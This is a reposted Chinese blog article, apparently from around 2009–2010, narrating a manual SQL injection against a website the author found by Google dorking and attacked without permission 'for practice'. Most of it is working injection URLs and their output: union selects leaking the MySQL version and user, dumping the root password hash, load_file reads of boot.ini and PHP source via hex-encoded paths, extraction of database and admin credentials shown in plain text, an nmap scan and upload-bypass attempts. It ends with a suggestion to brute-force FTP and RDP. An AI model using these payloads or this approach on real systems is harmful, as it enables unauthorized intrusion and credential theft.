一次典型的php+MySQL手工注射

2023-10-17 11:59

本文主要是介绍一次典型的php+MySQL手工注射,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一次典型的php+MySQL手工注射

大家好我是xxx,闲着无聊找个网站练练手,请出google “inurl:php?id=80 site:XXX 关键字”
很快找到一个有漏洞的网站:

http://www.hacked.cn/autocar/show.php?id=42

加”‘”,网页部分内容消失。and 1=1 正常;and 1=2消失。存在注入漏洞,好就件捡软柿子捏!
判断mysql版本:

06182049-df371ce401074a138782da8150ca7ec5.png
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=4正常
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=5不正常。
order by 1;order by 2正常,order by 3不正常。字段2个。
检测基本信息:
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(@@version,0x3a,database(),0x3a,user()),2
得到
—————————
4.0.20a-nt:qiche:root@localhost
—————————
mysql用户root,mysql 4.0没法通过information_schema得到表名

只能才猜了
http://www.hacked.cn/autocar/show.php?id=42 union select 1.2 from admin
猜了常见的表名的均失败!郁闷!
尝试读取root密码
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(user,0x3a,password),2 from mysql.user
返回:
———————————
root:5fcbb1f400e20be1
———————————
得到mysql的root密码可以用cain去破解,这个暂时放着。

查询文件权限。
http://www.hacked.cn/autocar/show.php?id=-42 union select file_priv,2 from mysql.user
返回
——————————-
Y
——————————-
有读取文件的权限,由mysql版本4.0.20a-nt得知目标主机为Window系统。
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(‘c:\\boot.ini’),2
仍然返回空白,说明magic_qoutes=on,由于magic_qoutes=on我们无法通过 into outfile 来写shell。
郁闷!
但是我们可以读源文件!这就够了!

‘c:\\boot.ini’16进制编码0x633a5c626f6f742e696e69
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(0x633a5c626f6f742e696e69),2
返回:
——————————–
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT=”Microsoft Windows 2000 Server” /fastdetect
——————————-
目标主机系统Window2000确定. 下一步找后台,

http://www.hacked.cn/autocar/admin/

返回
——————————-
Warning: main(autocar/adodb/conn.php) [function.main]: failed to open stream: No such file or directory in D:\qicheweb\autocar/admin\index.php on line 1

Fatal error: main() [function.require]: Failed opening required ‘autocar/adodb/conn.php’ (include_path=’.;D:\RUIOA\webroot;D:\RUIOA\webroot\includes;D:\ruioa\RUIOA\php\pear’) in D:\qicheweb\autocar/admin\index.php on line 1
——————————–
直接告诉了我们数据库连接文件以及web路径,人品爆发了啊。

D:\qicheweb\autocar/adodb\conn.php
D:\qicheweb\autocar/admin\index.php
接着找后台,两下猜中了!
后台地址:

http://www.hacked.cn/autocar/login.php

查看表单,猜测管理员表名,没什么作用。

开始用load_file读源文件

D:\\qicheweb\\autocar\\adodb\\conn.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c61646f64625c636f6e6e2e706870),2

返回
——————————–
……
PConnect(’127.0.0.1′,’root’,'myoa888′,’qiche’);
……
$ypsm=1; $lxjsm=2; mysql_query(“SET NAMES GB2312″); /* $kd_conn = &ADONewConnection(‘mysql’); $kd_conn->PConnect(’127.0.0.1′,’highway’,'highway4438′,’highway’); */ $kd_conn=$conn; function err(){ echo
——————————–
获得mysql帐号密码
(’127.0.0.1′,’root’,'myoa888′,’qiche’)
(’127.0.0.1′,’highway’,'highway4438′,’highway’)

用得到的密码连接mysql,结果mysql不支持外连

用nmap顺便扫一下端口
——————————–
alone@alone-desktop:~/crk$ nmap -sT 127.0.0.1 -p 21,23,80,3306,1433,3389

Starting Nmap 4.53 ( http://insecure.org ) at 2009-08-23 16:58 CST
Interesting ports on 127.0.0.1:
PORT     STATE    SERVICE
21/tcp   open     ftp
23/tcp   filtered telnet
80/tcp   open     http
1433/tcp filtered ms-sql-s
3306/tcp open     mysql
3389/tcp open     ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 1.720 seconds
——————————–
用得到的帐号尝试ftp也登录不成功且ftp的banner显示
220 Serv-U FTP Server v6.1 for WinSock ready…
提权的时候可能用得到,这是后话不提。

接着读文件找到后台的表单和字段。
D:\\qicheweb\\autocar/\login.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c6c6f67696e2e706870),2

查看源代码,查找action
——————————–
<form name=”form1″ method=”post” action=”login_check.php”>
——————————–

读D:\\qicheweb\\autocar\\login_check.php
密码不对这接转到别的页面,不让我查看代码。郁闷!
用repalce函数将load_file结果中的‘<’(0x3c)换成‘:’(0x3a)

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

找到
——————————–
if($username!=”" && $password!=”"){

$sql=”select ad_jb,ad_username from lm_admin where ltrim(rtrim(ad_username))=’$username’ and ltrim(rtrim(ad_password))=’$password’”;
// echo $sql;
$rs=$conn->Execute($sql);
——————————–
有了表名和字段名,现在我们直接读出后台密码

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20concat(ad_username,0x3a,ad_password),2%20from%20lm_admin

得到
some:some
登录后台居然发现没法得到webshell,发现用的是
eWebEditor编辑器,而且web支持列目录。
找了半天
eWebEditor/upload.php里面有javascript验证后缀名,而且没有session验证可以直接上传,本地保存成html,添加php后缀允许上传。
结果jpg的文件能上传,php的还是传不上去。
eWebEditor目录

接着读下eWebEditor/upload.php源文件吧
——————————-
……
//检测扩展名的有效性

function CheckValidExt($sExt)
{
global $sAllowExt;
$aExt = explode("|",$sAllowExt);
if (in_array($sExt, $aExt)) {
Return 1;
} else {
OutScript("parent . UploadError('提示:\n\n请选择一个有效的文件,\n支持的格式有 ($sAllowExt)!')");
Return 0;
}
}

……
——————————-
发现php文件中貌似也检测了文件的后缀。
入侵就暂时到此吧。得到了新闻管理系统的后台。
我们可以读源文件,可以把文件挨着读出来说不定能找到一些漏洞呢。考虑到开了ftp,3389,可以尝试社会工程学,把数据库的密码都读去出来,用得到的密码尝试破解ftp或者3389。
真麻烦,不弄了就是玩玩跟他们又没仇何必那么认真啊。

来源: <http://www.0x50sec.org/pentest/2010/03/id/183/>

 

转载于:https://www.cnblogs.com/holyes/p/c7eb6b07df7a73ac88464f7418f86148.html

这篇关于一次典型的php+MySQL手工注射的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/225231

相关文章

通过ibd文件恢复MySql数据的操作方法

《通过ibd文件恢复MySql数据的操作方法》文章介绍通过.ibd文件恢复MySQL数据的过程,包括知道表结构和不知道表结构两种情况,对于知道表结构的情况,可以直接将.ibd文件复制到新的数据库目录并... 目录第一种情况:知道表结构第二种情况:不知道表结构总结今天干了一件大事,安装1Panel导致原来服务

mysql关联查询速度慢的问题及解决

《mysql关联查询速度慢的问题及解决》:本文主要介绍mysql关联查询速度慢的问题及解决方案,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql关联查询速度慢1. 记录原因1.1 在一次线上的服务中1.2 最终发现2. 解决方案3. 具体操作总结mysql

Linux搭建Mysql主从同步的教程

《Linux搭建Mysql主从同步的教程》:本文主要介绍Linux搭建Mysql主从同步的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux搭建mysql主从同步1.启动mysql服务2.修改Mysql主库配置文件/etc/my.cnf3.重启主库my

MySql中的数据库连接池详解

《MySql中的数据库连接池详解》:本文主要介绍MySql中的数据库连接池方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql数据库连接池1、概念2、为什么会出现数据库连接池3、原理4、数据库连接池的提供商5、DataSource数据源6、DBCP7、C

MySQL的隐式锁(Implicit Lock)原理实现

《MySQL的隐式锁(ImplicitLock)原理实现》MySQL的InnoDB存储引擎中隐式锁是一种自动管理的锁,用于保证事务在行级别操作时的数据一致性和安全性,本文主要介绍了MySQL的隐式锁... 目录1. 背景:什么是隐式锁?2. 隐式锁的工作原理3. 隐式锁的类型4. 隐式锁的实现与源代码分析4

MySQL中Next-Key Lock底层原理实现

《MySQL中Next-KeyLock底层原理实现》Next-KeyLock是MySQLInnoDB存储引擎中的一种锁机制,结合记录锁和间隙锁,用于高效并发控制并避免幻读,本文主要介绍了MySQL中... 目录一、Next-Key Lock 的定义与作用二、底层原理三、源代码解析四、总结Next-Key L

MySQL常见的存储引擎和区别说明

《MySQL常见的存储引擎和区别说明》MySQL支持多种存储引擎,如InnoDB、MyISAM、MEMORY、Archive、CSV和Blackhole,每种引擎有其特点和适用场景,选择存储引擎时需根... 目录mysql常见的存储引擎和区别说明1. InnoDB2. MyISAM3. MEMORY4. A

Mysql中InnoDB与MyISAM索引差异详解(最新整理)

《Mysql中InnoDB与MyISAM索引差异详解(最新整理)》InnoDB和MyISAM在索引实现和特性上有差异,包括聚集索引、非聚集索引、事务支持、并发控制、覆盖索引、主键约束、外键支持和物理存... 目录1. 索引类型与数据存储方式InnoDBMyISAM2. 事务与并发控制InnoDBMyISAM

MySQL 日期时间格式化函数 DATE_FORMAT() 的使用示例详解

《MySQL日期时间格式化函数DATE_FORMAT()的使用示例详解》`DATE_FORMAT()`是MySQL中用于格式化日期时间的函数,本文详细介绍了其语法、格式化字符串的含义以及常见日期... 目录一、DATE_FORMAT()语法二、格式化字符串详解三、常见日期时间格式组合四、业务场景五、总结一、

mysql线上查询之前要性能调优的技巧及示例

《mysql线上查询之前要性能调优的技巧及示例》文章介绍了查询优化的几种方法,包括使用索引、避免不必要的列和行、有效的JOIN策略、子查询和派生表的优化、查询提示和优化器提示等,这些方法可以帮助提高数... 目录避免不必要的列和行使用有效的JOIN策略使用子查询和派生表时要小心使用查询提示和优化器提示其他常